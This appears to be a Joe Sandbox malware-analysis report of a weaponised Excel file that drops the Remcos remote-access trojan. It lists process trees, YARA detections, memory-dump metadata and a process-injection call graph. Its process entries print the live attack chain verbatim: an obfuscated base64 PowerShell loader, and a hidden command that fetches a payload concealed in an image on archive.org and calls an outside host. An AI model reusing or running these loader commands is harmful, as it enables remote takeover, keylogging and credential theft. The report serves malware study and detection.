?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBG? ? ? ? ?EM? ? ? ? ?QgBS? ? ? ? ?C8? ? ? ? ?Nw? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?5? ? ? ? ?C4? ? ? ? ?N? ? ? ? ?? ? ? ? ?z? ? ? ? ?DI? ? ? ? ?Lg? ? ? ? ?0? ? ? ? ?Dg? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?Dc? ? ? ? ?Mw? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                              Imagebase:0xe10000
                                                              File size:427'008 bytes
                                                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:13
                                                              Start time:08:00:44
                                                              Start date:28/08/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FCBR/77/19.432.481.731//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                                                              Imagebase:0xe10000
                                                              File size:427'008 bytes
                                                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.465793095.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.465793095.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.465793095.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.465793095.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:14
                                                              Start time:08:00:50
                                                              Start date:28/08/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                              Imagebase:0x1240000
                                                              File size:64'704 bytes
                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.997515162.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000E.00000002.997362053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:15
                                                              Start time:08:01:04
                                                              Start date:28/08/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\eibgqlhhydk"
                                                              Imagebase:0x1240000
                                                              File size:64'704 bytes
                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:16
                                                              Start time:08:01:04
                                                              Start date:28/08/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\pcgrqdsjmlcrsdy"
                                                              Imagebase:0x1240000
                                                              File size:64'704 bytes
                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:17
                                                              Start time:08:01:04
                                                              Start date:28/08/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zeljrwdcztuwukmaun"
                                                              Imagebase:0x1240000
                                                              File size:64'704 bytes
                                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Call Graph

                                                              • Entrypoint
                                                              • Decryption Function
                                                              • Executed
                                                              • Not Executed
                                                              • Show Help
                                                              callgraph 1 Error: Graph is empty

                                                              Module: Sheet1

                                                              Declaration
                                                              LineContent
                                                              1

                                                              Attribute VB_Name = "Sheet1"

                                                              2

                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                              3

                                                              Attribute VB_GlobalNameSpace = False

                                                              4

                                                              Attribute VB_Creatable = False

                                                              5

                                                              Attribute VB_PredeclaredId = True

                                                              6

                                                              Attribute VB_Exposed = True

                                                              7

                                                              Attribute VB_TemplateDerived = False

                                                              8

                                                              Attribute VB_Customizable = True

                                                              Module: Sheet2

                                                              Declaration
                                                              LineContent
                                                              1

                                                              Attribute VB_Name = "Sheet2"

                                                              2

                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                              3

                                                              Attribute VB_GlobalNameSpace = False

                                                              4

                                                              Attribute VB_Creatable = False

                                                              5

                                                              Attribute VB_PredeclaredId = True

                                                              6

                                                              Attribute VB_Exposed = True

                                                              7

                                                              Attribute VB_TemplateDerived = False

                                                              8

                                                              Attribute VB_Customizable = True

                                                              Module: Sheet3

                                                              Declaration
                                                              LineContent
                                                              1

                                                              Attribute VB_Name = "Sheet3"

                                                              2

                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                              3

                                                              Attribute VB_GlobalNameSpace = False

                                                              4

                                                              Attribute VB_Creatable = False

                                                              5

                                                              Attribute VB_PredeclaredId = True

                                                              6

                                                              Attribute VB_Exposed = True

                                                              7

                                                              Attribute VB_TemplateDerived = False

                                                              8

                                                              Attribute VB_Customizable = True

                                                              Module: ThisWorkbook

                                                              Declaration
                                                              LineContent
                                                              1

                                                              Attribute VB_Name = "ThisWorkbook"

                                                              2

                                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                              3

                                                              Attribute VB_GlobalNameSpace = False

                                                              4

                                                              Attribute VB_Creatable = False

                                                              5

                                                              Attribute VB_PredeclaredId = True

                                                              6

                                                              Attribute VB_Exposed = True

                                                              7

                                                              Attribute VB_TemplateDerived = False

                                                              8

                                                              Attribute VB_Customizable = True

                                                              Reset < >
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.444358881.00000000002AF000.00000004.00000020.00020000.00000000.sdmp, Offset: 002AF000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_2af000_EQNEDT32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 5, m$5, m
                                                                • API String ID: 0-868598950
                                                                • Opcode ID: ac48d8693f89393dfff6edb5e1d6d0cb638bd6993ae828b6e88ee7a45f61c627
                                                                • Instruction ID: b379f3a51676b60ee481ac111a8f7a322a84a794e4ffff63a9ff9fb7450d9295
                                                                • Opcode Fuzzy Hash: ac48d8693f89393dfff6edb5e1d6d0cb638bd6993ae828b6e88ee7a45f61c627
                                                                • Instruction Fuzzy Hash: FA82DB5245E7C14FC7278B704EBAAA1BF706D1321470E86CFC8C98E8A3D359995AD363
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.468779848.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_19d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ff632fae8f7294030ab042b72a39915441493d8cf69ae575f0073814b5a909f5
                                                                • Instruction ID: 507ac260ae7f7e12e375bc4d3c1cfe3dded95923a8d7984599c7f8936c45caab
                                                                • Opcode Fuzzy Hash: ff632fae8f7294030ab042b72a39915441493d8cf69ae575f0073814b5a909f5
                                                                • Instruction Fuzzy Hash: 9B01A271508340AAEB204A25ECC4B67FB98EF91724F2C855AFC490B282C37A9945CAB1
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.468779848.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_19d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: df0b94e3f8c3f25a6179de88b8885006ebbb987c6fb23b8ab2406fac9b4235b5
                                                                • Instruction ID: 83f028e719d82b17e6a69c62f25bcfe269ec5c6d41a332f62b8ce37db743c069
                                                                • Opcode Fuzzy Hash: df0b94e3f8c3f25a6179de88b8885006ebbb987c6fb23b8ab2406fac9b4235b5
                                                                • Instruction Fuzzy Hash: FAF06271504244AFEB108A16DCC4BA6FB98EF91724F18C55AED484B286C3799D45CAB1

                                                                Execution Graph

                                                                Execution Coverage:10.3%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:46
                                                                Total number of Limit Nodes:2
                                                                execution_graph 4921 264b40 4922 264b67 4921->4922 4925 264c90 4922->4925 4926 264cba 4925->4926 4927 264c7c 4926->4927 4930 264d48 4926->4930 4946 264d58 4926->4946 4932 264d58 4930->4932 4962 261724 4932->4962 4933 264f54 4934 261730 Wow64SetThreadContext 4933->4934 4936 265053 4933->4936 4934->4936 4935 26176c WriteProcessMemory 4939 26537c 4935->4939 4936->4935 4937 26561b 4938 26176c WriteProcessMemory 4937->4938 4940 26566c 4938->4940 4939->4937 4942 26176c WriteProcessMemory 4939->4942 4941 261778 Wow64SetThreadContext 4940->4941 4943 26576f 4940->4943 4941->4943 4942->4939 4944 261790 ResumeThread 4943->4944 4945 265821 4944->4945 4945->4926 4947 264d8b 4946->4947 4948 261724 CreateProcessW 4947->4948 4949 264f54 4948->4949 4952 265053 4949->4952 4977 261730 4949->4977 4966 26176c 4952->4966 4953 26561b 4954 26176c WriteProcessMemory 4953->4954 4955 26566c 4954->4955 4959 26576f 4955->4959 4970 261778 4955->4970 4957 26537c 4957->4953 4958 26176c WriteProcessMemory 4957->4958 4958->4957 4974 261790 4959->4974 4963 265930 CreateProcessW 4962->4963 4965 265b24 4963->4965 4965->4965 4967 265f98 WriteProcessMemory 4966->4967 4969 266078 4967->4969 4969->4957 4971 265c68 Wow64SetThreadContext 4970->4971 4973 265d24 4971->4973 4973->4959 4975 2660d8 ResumeThread 4974->4975 4976 265821 4975->4976 4976->4926 4978 265c68 Wow64SetThreadContext 4977->4978 4980 265d24 4978->4980 4980->4952

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 32203c-32203f 1 322041-322043 0->1 2 322045-32204d 0->2 1->2 3 322065-322069 2->3 4 32204f-322054 2->4 7 322194-32219e 3->7 8 32206f-322073 3->8 5 322055 4->5 6 322059-322063 4->6 5->6 9 322057 5->9 6->3 10 3221a0-3221a9 7->10 11 3221ac-3221b2 7->11 12 3220b3 8->12 13 322075-322086 8->13 9->3 16 3221b4-3221b6 11->16 17 3221b8-3221c4 11->17 14 3220b5-3220b7 12->14 22 3221ec-32223b 13->22 23 32208c-322091 13->23 14->7 18 3220bd-3220c1 14->18 20 3221c6-3221e9 16->20 17->20 18->7 21 3220c7-3220cb 18->21 21->7 26 3220d1-3220f7 21->26 33 322241-322246 22->33 34 32243e-32244d 22->34 27 322093-322099 23->27 28 3220a9-3220b1 23->28 26->7 49 3220fd-322101 26->49 30 32209b 27->30 31 32209d-3220a7 27->31 28->14 30->28 31->28 37 322248-32224e 33->37 38 32225e-322262 33->38 39 322252-32225c 37->39 40 322250 37->40 42 3223e7-3223f1 38->42 43 322268-32226a 38->43 39->38 40->38 47 3223f3-3223fa 42->47 48 3223fd-322403 42->48 45 32227a 43->45 46 32226c-322278 43->46 50 32227c-32227e 45->50 46->50 51 322405-322407 48->51 52 322409-322415 48->52 54 322103-32210c 49->54 55 322124 49->55 50->42 56 322284-3222a3 50->56 57 322417-32243b 51->57 52->57 59 322113-322120 54->59 60 32210e-322111 54->60 58 322127-322134 55->58 70 3222b3 56->70 71 3222a5-3222b1 56->71 65 32213a-322191 58->65 61 322122 59->61 60->61 61->58 72 3222b5-3222b7 70->72 71->72 72->42 73 3222bd-3222c1 72->73 73->42 74 3222c7-3222cb 73->74 75 3222de 74->75 76 3222cd-3222dc 74->76 77 3222e0-3222e2 75->77 76->77 77->42 78 3222e8-3222ec 77->78 78->42 79 3222f2-322311 78->79 82 322313-322319 79->82 83 322329-322334 79->83 84 32231b 82->84 85 32231d-32231f 82->85 86 322343-32235f 83->86 87 322336-322339 83->87 84->83 85->83 88 322361-322374 86->88 89 32237c-322386 86->89 87->86 88->89 90 32238a-3223d8 89->90 91 322388 89->91 92 3223dd-3223e4 90->92 91->92
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.463600035.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_320000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: L4#p$L4#p$L4#p$d=0
                                                                • API String ID: 0-395300982
                                                                • Opcode ID: 6d49726a86b3693d08190cc9a59cf4e9c42143dc07db630eb3c923ece69b308a
                                                                • Instruction ID: 71dcb01102f8cb9c3e2235155a0c9e325292aabd82c29421e92b578786dda9ca
                                                                • Opcode Fuzzy Hash: 6d49726a86b3693d08190cc9a59cf4e9c42143dc07db630eb3c923ece69b308a
                                                                • Instruction Fuzzy Hash: EBB13535700264EFDF168F64EC10BAF7BA1AF85310F1584AAEA018B291CB71DD55CB91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 99 320b98-320bbb 100 320bc1-320bc6 99->100 101 320d96-320ddb 99->101 102 320bc8-320bce 100->102 103 320bde-320be2 100->103 109 320f32-320f7e 101->109 110 320de1-320de6 101->110 104 320bd2-320bdc 102->104 105 320bd0 102->105 106 320d43-320d4d 103->106 107 320be8-320bec 103->107 104->103 105->103 111 320d5b-320d61 106->111 112 320d4f-320d58 106->112 113 320bee-320bfd 107->113 114 320bff 107->114 131 320f84-320f89 109->131 132 3210eb-32111d 109->132 115 320de8-320dee 110->115 116 320dfe-320e02 110->116 118 320d63-320d65 111->118 119 320d67-320d73 111->119 120 320c01-320c03 113->120 114->120 121 320df2-320dfc 115->121 122 320df0 115->122 124 320e08-320e0a 116->124 125 320edf-320ee9 116->125 123 320d75-320d93 118->123 119->123 120->106 126 320c09-320c29 120->126 121->116 122->116 129 320e1a 124->129 130 320e0c-320e18 124->130 133 320ef7-320efd 125->133 134 320eeb-320ef4 125->134 163 320c2b-320c46 126->163 164 320c48 126->164 138 320e1c-320e1e 129->138 130->138 141 320fa1-320fa5 131->141 142 320f8b-320f91 131->142 157 32111f-32112b 132->157 158 32112d 132->158 135 320f03-320f0f 133->135 136 320eff-320f01 133->136 143 320f11-320f2f 135->143 136->143 138->125 146 320e24-320e28 138->146 144 32109a-3210a4 141->144 145 320fab-320fad 141->145 148 320f93 142->148 149 320f95-320f9f 142->149 159 3210b2-3210b8 144->159 160 3210a6-3210af 144->160 151 320faf-320fbb 145->151 152 320fbd 145->152 153 320e2a-320e46 146->153 154 320e48 146->154 148->141 149->141 169 320fbf-320fc1 151->169 152->169 168 320e4a-320e4c 153->168 154->168 162 32112f-321131 157->162 158->162 165 3210ba-3210bc 159->165 166 3210be-3210ca 159->166 175 321133-321139 162->175 176 32117d-321187 162->176 172 320c4a-320c4c 163->172 164->172 170 3210cc-3210e8 165->170 166->170 168->125 171 320e52-320e65 168->171 169->144 173 320fc7-320fc9 169->173 203 320e6b-320e6d 171->203 172->106 182 320c52-320c54 172->182 185 320fcb-320fd7 173->185 186 320fd9 173->186 178 321147-321164 175->178 179 32113b-32113d 175->179 183 321192-321198 176->183 184 321189-32118f 176->184 201 321166-321177 178->201 202 3211ca-3211cf 178->202 179->178 191 320c56-320c62 182->191 192 320c64 182->192 187 32119a-32119c 183->187 188 32119e-3211aa 183->188 194 320fdb-320fdd 185->194 186->194 195 3211ac-3211c7 187->195 188->195 198 320c66-320c68 191->198 192->198 194->144 199 320fe3-320fe5 194->199 198->106 204 320c6e-320c8e 198->204 206 320fe7-320fed 199->206 207 320fff-321003 199->207 201->176 202->201 211 320e85-320edc 203->211 212 320e6f-320e75 203->212 228 320c90-320c96 204->228 229 320ca6-320caa 204->229 213 320ff1-320ffd 206->213 214 320fef 206->214 208 321005-32100b 207->208 209 32101d-321097 207->209 215 32100f-32101b 208->215 216 32100d 208->216 218 320e77 212->218 219 320e79-320e7b 212->219 213->207 214->207 215->209 216->209 218->211 219->211 233 320c9a-320c9c 228->233 234 320c98 228->234 230 320cc4-320cc8 229->230 231 320cac-320cb2 229->231 237 320ccf-320cd1 230->237 235 320cb6-320cc2 231->235 236 320cb4 231->236 233->229 234->229 235->230 236->230 239 320cd3-320cd9 237->239 240 320ce9-320d40 237->240 241 320cdb 239->241 242 320cdd-320cdf 239->242 241->240 242->240
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.463600035.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_320000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8#f$8#f$l;0$l;0
                                                                • API String ID: 0-3551374118
